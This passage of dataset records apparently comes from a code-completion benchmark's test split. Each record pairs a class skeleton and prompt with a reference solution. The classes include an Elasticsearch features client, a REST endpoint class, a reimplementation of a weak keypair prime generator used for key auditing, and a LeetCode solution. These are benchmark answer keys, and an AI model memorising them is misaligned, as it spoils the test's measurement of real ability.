t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Resets the internal state of features, usually by deleting system indices ``_\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n __path = '/_features'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('GET', __path, params=__query, headers=__headers)\n<|end_body_0|>\n\n<|body_start_1|>\n __path = '/_features/_reset'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('POST', __path, params=__query, headers=__headers)\n<|end_body_1|>\n", "revision_id": "915bbd784831ccb84e1559af0f829736652d2e78", "skeleton": "<|skeleton|>\nclass FeaturesClient:\n\n async def get_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot ``_\"\"\"\n <|body_0|>\n\n async def reset_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Resets the internal state of features, usually by deleting system indices ``_\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FeaturesClient:\n async def get_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Gets a list of features which can be included in snapshots using the feature_states field when creating a snapshot ``_\"\"\"\n __path = '/_features'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('GET', __path, params=__query, headers=__headers)\n\n async def reset_features(self, *, error_trace: t.Optional[bool]=None, filter_path: t.Optional[t.Union[str, t.Union[t.List[str], t.Tuple[str, ...]]]]=None, human: t.Optional[bool]=None, pretty: t.Optional[bool]=None) -> ObjectApiResponse[t.Any]:\n \"\"\"Resets the internal state of features, usually by deleting system indices ``_\"\"\"\n __path = '/_features/_reset'\n __query: t.Dict[str, t.Any] = {}\n if error_trace is not None:\n __query['error_trace'] = error_trace\n if filter_path is not None:\n __query['filter_path'] = filter_path\n if human is not None:\n __query['human'] = human\n if pretty is not None:\n __query['pretty'] = pretty\n __headers = {'accept': 'application/json'}\n return await self.perform_request('POST', __path, params=__query, headers=__headers)\n", "source": "the_stack_v2_python_sparse", "source_path": "elasticsearch/_async/client/features.py", "source_repo": "elastic/elasticsearch-py", "split": "test", "star_events_count": 3845} {"blob_id": "ca3e6c50ee6c12dfed3588318923f3633bf9dc9a", "bodies": ["try:\n verify_token(request.headers)\nexcept Exception as err:\n ns.abort(401, message=err)\ntry:\n obs = observaciones_ires_cytg.read(id)\nexcept psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\nexcept EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\nexcept Exception as err:\n ns.abort(400, message=err)\nreturn obs", "try:\n verify_token(request.headers)\nexcept Exception as err:\n ns.abort(401, message=err)\ntry:\n obs = observaciones_ires_cytg.update(id, **api.payload)\nexcept psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\nexcept KeyError as err:\n ns.abort(400, message='Review the keys in your payload: {}'.format(err))\nexcept EmptySetError as err:\n ns.abort(404, message=ObservacionCyTG.obs_not_found + '. ' + str(err))\nexcept Exception as err:\n ns.abort(400, message=err)\nreturn obs", "try:\n verify_token(request.headers)\nexcept Exception as err:\n ns.abort(401, message=err)\ntry:\n obs = observaciones_ires_cytg.delete(id)\nexcept psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\nexcept EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\nexcept Exception as err:\n ns.abort(400, message=err)\nreturn obs"], "bodies_text": "<|body_start_0|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.read(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.update(id, **api.payload)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except KeyError as err:\n ns.abort(400, message='Review the keys in your payload: {}'.format(err))\n except EmptySetError as err:\n ns.abort(404, message=ObservacionCyTG.obs_not_found + '. ' + str(err))\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.delete(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_2|>\n", "class_docstring": "", "class_name": "ObservacionCyTG", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ObservacionCyTG:\n\n def get(self, id):\n \"\"\"To fetch an observation (CyTG (resultados))\"\"\"\n <|body_0|>\n\n def put(self, id):\n \"\"\"To update an observation (CyTG (resultados))\"\"\"\n <|body_1|>\n\n def delete(self, id):\n \"\"\"To delete an observation (CyTG (resultados))\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.read(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.update(id, **api.payload)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except KeyError as err:\n ns.abort(400, message='Review the keys in your payload: {}'.format(err))\n except EmptySetError as err:\n ns.abort(404, message=ObservacionCyTG.obs_not_found + '. ' + str(err))\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.delete(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000361", "length_bytes": 18120, "license_type": "no_license", "methods": [{"docstring": "To fetch an observation (CyTG (resultados))", "name": "get", "signature": "def get(self, id)"}, {"docstring": "To update an observation (CyTG (resultados))", "name": "put", "signature": "def put(self, id)"}, {"docstring": "To delete an observation (CyTG (resultados))", "name": "delete", "signature": "def delete(self, id)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_001264", "prompt": "Implement the Python class `ObservacionCyTG` described below.\n\nClass description:\nImplement the ObservacionCyTG class.\n\nMethod signatures and docstrings:\n- def get(self, id): To fetch an observation (CyTG (resultados))\n- def put(self, id): To update an observation (CyTG (resultados))\n- def delete(self, id): To delete an observation (CyTG (resultados))", "prompted_full_text": "Implement the Python class `ObservacionCyTG` described below.\n\nClass description:\nImplement the ObservacionCyTG class.\n\nMethod signatures and docstrings:\n- def get(self, id): To fetch an observation (CyTG (resultados))\n- def put(self, id): To update an observation (CyTG (resultados))\n- def delete(self, id): To delete an observation (CyTG (resultados))\n\n<|skeleton|>\nclass ObservacionCyTG:\n\n def get(self, id):\n \"\"\"To fetch an observation (CyTG (resultados))\"\"\"\n <|body_0|>\n\n def put(self, id):\n \"\"\"To update an observation (CyTG (resultados))\"\"\"\n <|body_1|>\n\n def delete(self, id):\n \"\"\"To delete an observation (CyTG (resultados))\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.read(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.update(id, **api.payload)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except KeyError as err:\n ns.abort(400, message='Review the keys in your payload: {}'.format(err))\n except EmptySetError as err:\n ns.abort(404, message=ObservacionCyTG.obs_not_found + '. ' + str(err))\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_1|>\n\n<|body_start_2|>\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.delete(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n<|end_body_2|>\n", "revision_id": "e00610fac26ef3ca078fd037c0649b70fa0e9a09", "skeleton": "<|skeleton|>\nclass ObservacionCyTG:\n\n def get(self, id):\n \"\"\"To fetch an observation (CyTG (resultados))\"\"\"\n <|body_0|>\n\n def put(self, id):\n \"\"\"To update an observation (CyTG (resultados))\"\"\"\n <|body_1|>\n\n def delete(self, id):\n \"\"\"To delete an observation (CyTG (resultados))\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ObservacionCyTG:\n def get(self, id):\n \"\"\"To fetch an observation (CyTG (resultados))\"\"\"\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.read(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n\n def put(self, id):\n \"\"\"To update an observation (CyTG (resultados))\"\"\"\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.update(id, **api.payload)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except KeyError as err:\n ns.abort(400, message='Review the keys in your payload: {}'.format(err))\n except EmptySetError as err:\n ns.abort(404, message=ObservacionCyTG.obs_not_found + '. ' + str(err))\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n\n def delete(self, id):\n \"\"\"To delete an observation (CyTG (resultados))\"\"\"\n try:\n verify_token(request.headers)\n except Exception as err:\n ns.abort(401, message=err)\n try:\n obs = observaciones_ires_cytg.delete(id)\n except psycopg2.Error as err:\n ns.abort(400, message=get_msg_pgerror(err))\n except EmptySetError:\n ns.abort(404, message=ObservacionCyTG.obs_not_found)\n except Exception as err:\n ns.abort(400, message=err)\n return obs\n", "source": "the_stack_v2_python_sparse", "source_path": "DOS/soa/service/genl/endpoints/observaciones_ires_cytg.py", "source_repo": "Telematica/knight-rider", "split": "test", "star_events_count": 1} {"blob_id": "37cec75c0862a16454ff11d73a081aa59cc4bd6a", "bodies": ["t = hashlib.sha1(seed).digest()\nkey = hashlib.sha1(t).digest()\nself.orig_key = key\nseed = hashlib.sha1(key).digest()\nself.key = key[:16]\nself.seed = seed[:16]", "p_size_bytes = p_size_bits // 8\nwhile True:\n prime_bytes = b''\n idx = 0\n while len(prime_bytes) <= p_size_bytes:\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n prime_bytes += encryptor.update(self.seed)\n seed_inc = (int.from_bytes(self.seed, 'big') + 1).to_bytes(16, 'big')\n self.key = encryptor.update(seed_inc)\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n self.seed = encryptor.update(seed_inc)\n prime_bytes = prime_bytes[1:p_size_bytes + 1]\n p = int.from_bytes(prime_bytes, 'big')\n p |= 1 << p_size_bits - 1\n p += 31 - p % 30\n while not gmpy.is_prime(p, 1):\n p += GCD_30_DELTA[idx % 8]\n idx += 1\n if gmpy.is_prime(p, 10):\n return p", "p_size_bits = bits // 2\np = self.generate_prime(p_size_bits)\nq = self.generate_prime(p_size_bits)\nwhile True:\n if q > p:\n p, q = (q, p)\n n = p * q\n if n.bit_length() == bits:\n return (p, q)\n q = self.generate_prime(p_size_bits)"], "bodies_text": "<|body_start_0|>\n t = hashlib.sha1(seed).digest()\n key = hashlib.sha1(t).digest()\n self.orig_key = key\n seed = hashlib.sha1(key).digest()\n self.key = key[:16]\n self.seed = seed[:16]\n<|end_body_0|>\n\n<|body_start_1|>\n p_size_bytes = p_size_bits // 8\n while True:\n prime_bytes = b''\n idx = 0\n while len(prime_bytes) <= p_size_bytes:\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n prime_bytes += encryptor.update(self.seed)\n seed_inc = (int.from_bytes(self.seed, 'big') + 1).to_bytes(16, 'big')\n self.key = encryptor.update(seed_inc)\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n self.seed = encryptor.update(seed_inc)\n prime_bytes = prime_bytes[1:p_size_bytes + 1]\n p = int.from_bytes(prime_bytes, 'big')\n p |= 1 << p_size_bits - 1\n p += 31 - p % 30\n while not gmpy.is_prime(p, 1):\n p += GCD_30_DELTA[idx % 8]\n idx += 1\n if gmpy.is_prime(p, 10):\n return p\n<|end_body_1|>\n\n<|body_start_2|>\n p_size_bits = bits // 2\n p = self.generate_prime(p_size_bits)\n q = self.generate_prime(p_size_bits)\n while True:\n if q > p:\n p, q = (q, p)\n n = p * q\n if n.bit_length() == bits:\n return (p, q)\n q = self.generate_prime(p_size_bits)\n<|end_body_2|>\n", "class_docstring": "Class for generating Keypair modulus for a given seed and bit size.", "class_name": "Generator", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Generator:\n \"\"\"Class for generating Keypair modulus for a given seed and bit size.\"\"\"\n\n def __init__(self, seed: bytes):\n \"\"\"Initializes the PRNG given an initial seed. Args: seed: the initial seed used in the PRNG.\"\"\"\n <|body_0|>\n\n def generate_prime(self, p_size_bits: int) -> int:\n \"\"\"Generates a prime using Keypair PRNG. The prime is assembled by concatenating AES blocks. Original implementation is at https://github.com/juliangruber/keypair/blob/master/index.js. Args: p_size_bits: bit size of the prime to be generated. Returns: The generated prime.\"\"\"\n <|body_1|>\n\n def generate_key(self, bits: int) -> tuple[int, int]:\n \"\"\"Generates the primes as in an RSA key. Args: bits: bit size of the RSA key/modulus. Returns: a tuple containing the two primes of the RSA key/modulus.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n t = hashlib.sha1(seed).digest()\n key = hashlib.sha1(t).digest()\n self.orig_key = key\n seed = hashlib.sha1(key).digest()\n self.key = key[:16]\n self.seed = seed[:16]\n<|end_body_0|>\n\n<|body_start_1|>\n p_size_bytes = p_size_bits // 8\n while True:\n prime_bytes = b''\n idx = 0\n while len(prime_bytes) <= p_size_bytes:\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n prime_bytes += encryptor.update(self.seed)\n seed_inc = (int.from_bytes(self.seed, 'big') + 1).to_bytes(16, 'big')\n self.key = encryptor.update(seed_inc)\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n self.seed = encryptor.update(seed_inc)\n prime_bytes = prime_bytes[1:p_size_bytes + 1]\n p = int.from_bytes(prime_bytes, 'big')\n p |= 1 << p_size_bits - 1\n p += 31 - p % 30\n while not gmpy.is_prime(p, 1):\n p += GCD_30_DELTA[idx % 8]\n idx += 1\n if gmpy.is_prime(p, 10):\n return p\n<|end_body_1|>\n\n<|body_start_2|>\n p_size_bits = bits // 2\n p = self.generate_prime(p_size_bits)\n q = self.generate_prime(p_size_bits)\n while True:\n if q > p:\n p, q = (q, p)\n n = p * q\n if n.bit_length() == bits:\n return (p, q)\n q = self.generate_prime(p_size_bits)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000362", "length_bytes": 3434, "license_type": "permissive", "methods": [{"docstring": "Initializes the PRNG given an initial seed. Args: seed: the initial seed used in the PRNG.", "name": "__init__", "signature": "def __init__(self, seed: bytes)"}, {"docstring": "Generates a prime using Keypair PRNG. The prime is assembled by concatenating AES blocks. Original implementation is at https://github.com/juliangruber/keypair/blob/master/index.js. Args: p_size_bits: bit size of the prime to be generated. Returns: The generated prime.", "name": "generate_prime", "signature": "def generate_prime(self, p_size_bits: int) -> int"}, {"docstring": "Generates the primes as in an RSA key. Args: bits: bit size of the RSA key/modulus. Returns: a tuple containing the two primes of the RSA key/modulus.", "name": "generate_key", "signature": "def generate_key(self, bits: int) -> tuple[int, int]"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002538", "prompt": "Implement the Python class `Generator` described below.\n\nClass description:\nClass for generating Keypair modulus for a given seed and bit size.\n\nMethod signatures and docstrings:\n- def __init__(self, seed: bytes): Initializes the PRNG given an initial seed. Args: seed: the initial seed used in the PRNG.\n- def generate_prime(self, p_size_bits: int) -> int: Generates a prime using Keypair PRNG. The prime is assembled by concatenating AES blocks. Original implementation is at https://github.com/juliangruber/keypair/blob/master/index.js. Args: p_size_bits: bit size of the prime to be generated. Returns: The generated prime.\n- def generate_key(self, bits: int) -> tuple[int, int]: Generates the primes as in an RSA key. Args: bits: bit size of the RSA key/modulus. Returns: a tuple containing the two primes of the RSA key/modulus.", "prompted_full_text": "Implement the Python class `Generator` described below.\n\nClass description:\nClass for generating Keypair modulus for a given seed and bit size.\n\nMethod signatures and docstrings:\n- def __init__(self, seed: bytes): Initializes the PRNG given an initial seed. Args: seed: the initial seed used in the PRNG.\n- def generate_prime(self, p_size_bits: int) -> int: Generates a prime using Keypair PRNG. The prime is assembled by concatenating AES blocks. Original implementation is at https://github.com/juliangruber/keypair/blob/master/index.js. Args: p_size_bits: bit size of the prime to be generated. Returns: The generated prime.\n- def generate_key(self, bits: int) -> tuple[int, int]: Generates the primes as in an RSA key. Args: bits: bit size of the RSA key/modulus. Returns: a tuple containing the two primes of the RSA key/modulus.\n\n<|skeleton|>\nclass Generator:\n \"\"\"Class for generating Keypair modulus for a given seed and bit size.\"\"\"\n\n def __init__(self, seed: bytes):\n \"\"\"Initializes the PRNG given an initial seed. Args: seed: the initial seed used in the PRNG.\"\"\"\n <|body_0|>\n\n def generate_prime(self, p_size_bits: int) -> int:\n \"\"\"Generates a prime using Keypair PRNG. The prime is assembled by concatenating AES blocks. Original implementation is at https://github.com/juliangruber/keypair/blob/master/index.js. Args: p_size_bits: bit size of the prime to be generated. Returns: The generated prime.\"\"\"\n <|body_1|>\n\n def generate_key(self, bits: int) -> tuple[int, int]:\n \"\"\"Generates the primes as in an RSA key. Args: bits: bit size of the RSA key/modulus. Returns: a tuple containing the two primes of the RSA key/modulus.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n t = hashlib.sha1(seed).digest()\n key = hashlib.sha1(t).digest()\n self.orig_key = key\n seed = hashlib.sha1(key).digest()\n self.key = key[:16]\n self.seed = seed[:16]\n<|end_body_0|>\n\n<|body_start_1|>\n p_size_bytes = p_size_bits // 8\n while True:\n prime_bytes = b''\n idx = 0\n while len(prime_bytes) <= p_size_bytes:\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n prime_bytes += encryptor.update(self.seed)\n seed_inc = (int.from_bytes(self.seed, 'big') + 1).to_bytes(16, 'big')\n self.key = encryptor.update(seed_inc)\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n self.seed = encryptor.update(seed_inc)\n prime_bytes = prime_bytes[1:p_size_bytes + 1]\n p = int.from_bytes(prime_bytes, 'big')\n p |= 1 << p_size_bits - 1\n p += 31 - p % 30\n while not gmpy.is_prime(p, 1):\n p += GCD_30_DELTA[idx % 8]\n idx += 1\n if gmpy.is_prime(p, 10):\n return p\n<|end_body_1|>\n\n<|body_start_2|>\n p_size_bits = bits // 2\n p = self.generate_prime(p_size_bits)\n q = self.generate_prime(p_size_bits)\n while True:\n if q > p:\n p, q = (q, p)\n n = p * q\n if n.bit_length() == bits:\n return (p, q)\n q = self.generate_prime(p_size_bits)\n<|end_body_2|>\n", "revision_id": "16e5f47fcc11f51d3fb58b50adddd075f4373bbc", "skeleton": "<|skeleton|>\nclass Generator:\n \"\"\"Class for generating Keypair modulus for a given seed and bit size.\"\"\"\n\n def __init__(self, seed: bytes):\n \"\"\"Initializes the PRNG given an initial seed. Args: seed: the initial seed used in the PRNG.\"\"\"\n <|body_0|>\n\n def generate_prime(self, p_size_bits: int) -> int:\n \"\"\"Generates a prime using Keypair PRNG. The prime is assembled by concatenating AES blocks. Original implementation is at https://github.com/juliangruber/keypair/blob/master/index.js. Args: p_size_bits: bit size of the prime to be generated. Returns: The generated prime.\"\"\"\n <|body_1|>\n\n def generate_key(self, bits: int) -> tuple[int, int]:\n \"\"\"Generates the primes as in an RSA key. Args: bits: bit size of the RSA key/modulus. Returns: a tuple containing the two primes of the RSA key/modulus.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Generator:\n \"\"\"Class for generating Keypair modulus for a given seed and bit size.\"\"\"\n\n def __init__(self, seed: bytes):\n \"\"\"Initializes the PRNG given an initial seed. Args: seed: the initial seed used in the PRNG.\"\"\"\n t = hashlib.sha1(seed).digest()\n key = hashlib.sha1(t).digest()\n self.orig_key = key\n seed = hashlib.sha1(key).digest()\n self.key = key[:16]\n self.seed = seed[:16]\n\n def generate_prime(self, p_size_bits: int) -> int:\n \"\"\"Generates a prime using Keypair PRNG. The prime is assembled by concatenating AES blocks. Original implementation is at https://github.com/juliangruber/keypair/blob/master/index.js. Args: p_size_bits: bit size of the prime to be generated. Returns: The generated prime.\"\"\"\n p_size_bytes = p_size_bits // 8\n while True:\n prime_bytes = b''\n idx = 0\n while len(prime_bytes) <= p_size_bytes:\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n prime_bytes += encryptor.update(self.seed)\n seed_inc = (int.from_bytes(self.seed, 'big') + 1).to_bytes(16, 'big')\n self.key = encryptor.update(seed_inc)\n encryptor = ciphers.Cipher(algorithms.AES(self.key), modes.ECB()).encryptor()\n self.seed = encryptor.update(seed_inc)\n prime_bytes = prime_bytes[1:p_size_bytes + 1]\n p = int.from_bytes(prime_bytes, 'big')\n p |= 1 << p_size_bits - 1\n p += 31 - p % 30\n while not gmpy.is_prime(p, 1):\n p += GCD_30_DELTA[idx % 8]\n idx += 1\n if gmpy.is_prime(p, 10):\n return p\n\n def generate_key(self, bits: int) -> tuple[int, int]:\n \"\"\"Generates the primes as in an RSA key. Args: bits: bit size of the RSA key/modulus. Returns: a tuple containing the two primes of the RSA key/modulus.\"\"\"\n p_size_bits = bits // 2\n p = self.generate_prime(p_size_bits)\n q = self.generate_prime(p_size_bits)\n while True:\n if q > p:\n p, q = (q, p)\n n = p * q\n if n.bit_length() == bits:\n return (p, q)\n q = self.generate_prime(p_size_bits)\n", "source": "the_stack_v2_python_sparse", "source_path": "paranoid_crypto/lib/keypair_generator.py", "source_repo": "google/paranoid_crypto", "split": "test", "star_events_count": 766} {"blob_id": "e88fd9c2254cf4a1054a10ef2f7e0b7b20d470a7", "bodies": ["MOD = 10 ** 9 + 7\nN = len(A)\nA.sort()\ndp = [1] * N\nindex = {x: i for i, x in enumerate(A)}\nfor i, x in enumerate(A):\n for j in range(i):\n if x % A[j] == 0:\n right = x // A[j]\n if right in index:\n dp[i] += dp[j] * dp[index[right]]\n dp[i] %= MOD\nreturn sum(dp) % MOD", "M = 10 ** 9 + 7\nA.sort()\nn, count = (len(A), {})\nres = 0\nfor i in range(n):\n cnt = 1\n for j in range(i):\n if A[i] % A[j] == 0 and A[i] // A[j] in count:\n cnt += count[A[j]] * count[A[i] // A[j]]\n count[A[i]] = cnt % M\n res = (res + count[A[i]]) % M\nreturn res"], "bodies_text": "<|body_start_0|>\n MOD = 10 ** 9 + 7\n N = len(A)\n A.sort()\n dp = [1] * N\n index = {x: i for i, x in enumerate(A)}\n for i, x in enumerate(A):\n for j in range(i):\n if x % A[j] == 0:\n right = x // A[j]\n if right in index:\n dp[i] += dp[j] * dp[index[right]]\n dp[i] %= MOD\n return sum(dp) % MOD\n<|end_body_0|>\n\n<|body_start_1|>\n M = 10 ** 9 + 7\n A.sort()\n n, count = (len(A), {})\n res = 0\n for i in range(n):\n cnt = 1\n for j in range(i):\n if A[i] % A[j] == 0 and A[i] // A[j] in count:\n cnt += count[A[j]] * count[A[i] // A[j]]\n count[A[i]] = cnt % M\n res = (res + count[A[i]]) % M\n return res\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def numFactoredBinaryTrees(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def numFactoredBinaryTrees2(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n MOD = 10 ** 9 + 7\n N = len(A)\n A.sort()\n dp = [1] * N\n index = {x: i for i, x in enumerate(A)}\n for i, x in enumerate(A):\n for j in range(i):\n if x % A[j] == 0:\n right = x // A[j]\n if right in index:\n dp[i] += dp[j] * dp[index[right]]\n dp[i] %= MOD\n return sum(dp) % MOD\n<|end_body_0|>\n\n<|body_start_1|>\n M = 10 ** 9 + 7\n A.sort()\n n, count = (len(A), {})\n res = 0\n for i in range(n):\n cnt = 1\n for j in range(i):\n if A[i] % A[j] == 0 and A[i] // A[j] in count:\n cnt += count[A[j]] * count[A[i] // A[j]]\n count[A[i]] = cnt % M\n res = (res + count[A[i]]) % M\n return res\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000363", "length_bytes": 2436, "license_type": "no_license", "methods": [{"docstring": ":type A: List[int] :rtype: int", "name": "numFactoredBinaryTrees", "signature": "def numFactoredBinaryTrees(self, A)"}, {"docstring": ":type A: List[int] :rtype: int", "name": "numFactoredBinaryTrees2", "signature": "def numFactoredBinaryTrees2(self, A)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002253", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def numFactoredBinaryTrees(self, A): :type A: List[int] :rtype: int\n- def numFactoredBinaryTrees2(self, A): :type A: List[int] :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def numFactoredBinaryTrees(self, A): :type A: List[int] :rtype: int\n- def numFactoredBinaryTrees2(self, A): :type A: List[int] :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def numFactoredBinaryTrees(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def numFactoredBinaryTrees2(self, A):\n \"\"\":type A: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n MOD = 10 ** 9 + 7\n N = len(A)\n A.sort()\n dp = [1] * N\n index = {x: i for i, x in enumerate(A)}\n for i, x in enumerate(A):\n for j in range(i):\n if x % A[j] == 0:\n right = x // A[j]\n if right in index:\n dp[i] += dp[j] * dp[index[right]]\n dp[i] %= MOD\n return sum(dp) % MOD\n<|end_body_0|>\n\n<|body_start_1|>\n M = 10 ** 9 + 7\n A.sort()\n n, count = (len(A), {})\n res = 0\n for i in range(n):\n cnt = 1\n for j in range(i):\n if A[i] % A[j] == 0 and A[i] // A[j] in count:\n cnt += count[A[j]] * count[A[i] // A[j]]\n count[A[i]] = cnt % M\n res = (res + count[A[i]]) % M\n return res\n<|end_body_1|>\n", 